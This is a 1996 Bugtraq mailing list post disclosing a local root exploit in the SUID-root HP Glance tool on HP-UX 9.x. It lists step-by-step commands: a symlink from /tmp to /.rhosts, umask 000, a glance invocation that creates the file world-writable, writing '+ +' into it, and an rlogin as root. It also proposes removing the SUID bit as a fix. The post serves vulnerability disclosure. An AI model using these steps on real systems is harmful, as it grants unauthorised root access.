Bugtraq mailing list archives
Vunerability in HP Glance ?
From: jjacobi () nova umuc edu (John W. Jacobi)
Date: Mon, 23 Sep 1996 00:07:03 -0700
Hi again, If this is out or old, I apologize. Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04 Product I exploited: HP Glance version B.09.04 What I gained: root access in under a minute without the root password. Subject: Creating a file as root, with world write permissions using HP Glance, while not being root, or truncating any file on the system. Problem: You could create /.rhosts , /etc/hosts.equiv , or whatever else your heart desires and then place arbitrary contents in it. Perhaps in the case of the r-command files a + + would suffice. Or you could truncate any file that root can. Possible short term resolution: Remove the SUID-ROOT thing off of glance. How I exploited to get quick root access: 1. I logged in as my regular account. 2. I checked for a root .rhosts file, it did not exist. 3. I made a sym link called /tmp/tempfile to roots would be .rhosts file like so: ln -s /.rhosts /tmp/tempfile 4. I set my umask to 000: umask 000 5. I ran glance with the following command line: glance -j 1 -f /tmp/tempfile -iterations 1 6. Thanks to glance the /.rhosts file suddenly appeared and was mode 666, sweet. 7. Next I typed (I could have vi'ed or something as well): echo "+ +" > /.rhosts 8. Then: rlogin localhost -l root 9. And, not surprisingly, I was logged in as root. Of course a little C program would be nice to automate this, but what if the C compiler is not installed ? You might still want to be root, wouldnt you ??? Question: Since there seems to be many of these little beasties in HP-UX, does anyone know if the problem is of a single source, or just a lot of vulnerable programs. Any feedback would be greatly appreciated... John W. Jacobi
Current thread:
- Vunerability in HP Glance ? John W. Jacobi (Sep 23)